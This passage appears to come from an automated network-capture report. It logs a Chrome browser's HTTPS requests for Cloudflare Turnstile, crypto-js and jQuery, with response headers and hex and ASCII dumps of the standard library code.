                                                            2025-01-07 19:24:56 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                            Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                            Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                            Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.849724104.17.25.144435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:56 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                            Host: cdnjs.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:57 UTC969INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:24:56 GMT
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            Cache-Control: public, max-age=30672000
                                                            ETag: W/"61182885-40eb"
                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                            cf-cdnjs-via: cfworker/kv
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Timing-Allow-Origin: *
                                                            X-Content-Type-Options: nosniff
                                                            CF-Cache-Status: HIT
                                                            Age: 1143644
                                                            Expires: Sun, 28 Dec 2025 19:24:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nQLypfbUrJux0MKf%2FgDoKfiHllOikl1Fr2c3O%2Fswy1B%2F6KcAvkSRaMeApOP%2F0LaOKN8YVW%2FfVe3UOr%2FoT5GgfKSAFLWn%2FNex%2Bm38immdXkZlvshxMzyLFJ6F24aMjCteBx4dmtF1"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                            Strict-Transport-Security: max-age=15780000
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654b7ea054408-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:24:57 UTC400INData Raw: 37 62 65 30 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                            Data Ascii: 7be0!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d
                                                            Data Ascii: ed"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 74 3d 6f 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72
                                                            Data Ascii: t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.r
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76
                                                            Data Ascii: tring"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(v
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 6e 20 4e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e
                                                            Data Ascii: n N(){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b
                                                            Data Ascii: ]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 61 79 28 74 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73
                                                            Data Ascii: ay(t.buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={s
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 3b 76 61 72 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46
                                                            Data Ascii: ;var o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEF
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 32 39 36 2a 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29
                                                            Data Ascii: 296*a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 79 2c 32 33 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c
                                                            Data Ascii: y,23,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.849725151.101.2.1374435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:56 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                            Host: code.jquery.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:57 UTC616INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 89501
                                                            Server: nginx
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                            ETag: "28feccc0-15d9d"
                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Via: 1.1 varnish, 1.1 varnish
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 07 Jan 2025 19:24:57 GMT
                                                            Age: 1762423
                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740045-EWR
                                                            X-Cache: HIT, HIT
                                                            X-Cache-Hits: 2774, 3540
                                                            X-Timer: S1736277897.006998,VS0,VE0
                                                            Vary: Accept-Encoding
                                                            2025-01-07 19:24:57 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                            2025-01-07 19:24:57 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                            2025-01-07 19:24:57 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
